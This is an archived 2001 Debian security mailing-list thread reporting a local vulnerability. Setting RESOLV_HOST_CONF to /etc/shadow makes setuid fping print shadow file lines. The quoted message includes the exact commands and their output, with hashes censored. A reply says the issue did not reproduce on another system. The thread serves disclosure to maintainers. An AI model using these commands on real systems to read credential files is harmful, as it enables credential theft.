Re[2]: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
When I tried it, I did not get the same results.
-rwsr-xr-x 1 root root 19728 Oct 30 1999 /usr/bin/fping*
ldd `which fping`
libc.so.6 => /lib/libc.so.6 (0x00127000)
/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x00110000)
ping localhost
PING localhost (127.0.0.1): 56 data bytes
--- localhost ping statistics ---
6 packets transmitted, 0 packets received, 100% packet loss
fping localhost
localhost is unreachable
--
Kevin - cog@iwz.com
-- Original message --
> Since I've not had any response yet, I thought I'd give a demonstration of how
> nasty this is:
> Script started on Mon Jan 8 17:48:23 2001
> thomas@io:~$ export RESOLV_HOST_CONF=/etc/shadow
> thomas@io:~$ ping localhost
> PING localhost (127.0.0.1): 56 data bytes
> --- localhost ping statistics ---
> 2 packets transmitted, 0 packets received, 100% packet loss
> thomas@io:~$ fping localhost
> /etc/shadow: line 1: bad command `root:<censored>:11063:0:99999:7:::'
> [snip]
> /etc/shadow: line 73: bad command `gdm:!:11285:0:99999:7:::'
> localhost is unreachable
> thomas@io:~$ ls -l `which fping`
> -rwsr-xr-x 1 root root 19728 May 15 2000 /usr/bin/fping
> thomas@io:~$ ls -l `which ping`
> -rwsr-xr-x 1 root root 15036 Dec 31 04:11 /bin/ping
> thomas@io:~$ ldd `which fping`
> libc.so.6 => /lib/libc.so.6 (0x40021000)
> /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
> thomas@io:~$ ldd `which ping`
> libc.so.6 => /lib/libc.so.6 (0x40021000)
> /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
> thomas@io:~$ exit
> Script done on Mon Jan 8 17:49:42 2001
> It seems to work for some setuid programs, but not others. I'm running the
> most recent packages from unstable as of today:
> ii libc6 2.2-9 GNU C Library: Shared libraries and Timezone
> ii netkit-ping 0.10-5 The ping utility from netkit
> ii fping 2.2b1-2 Send ICMP ECHO_REQUEST packets to network ho
> cheers,
> Thomas
> On Mon, 8 Jan 2001, thomas lakofski wrote:
>> From: thomas lakofski <thomas@88.net>
>> To: security@debian.org, debian-security@lists.debian.org
>> Date: Mon, 8 Jan 2001 13:34:52 +0000 (GMT)
>> Subject: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
>>
>> Hi,
>>
>> A friend of mine just tried this against my unstable box and successfully
>> obtained the contents of /etc/shadow.
>>
>> I imagine that this is a problem in libc -- I'll leave it to
>> security@debian.org to file bug reports.
>>
>> cheers,
>>
>> Thomas
>>
>>
Reply to: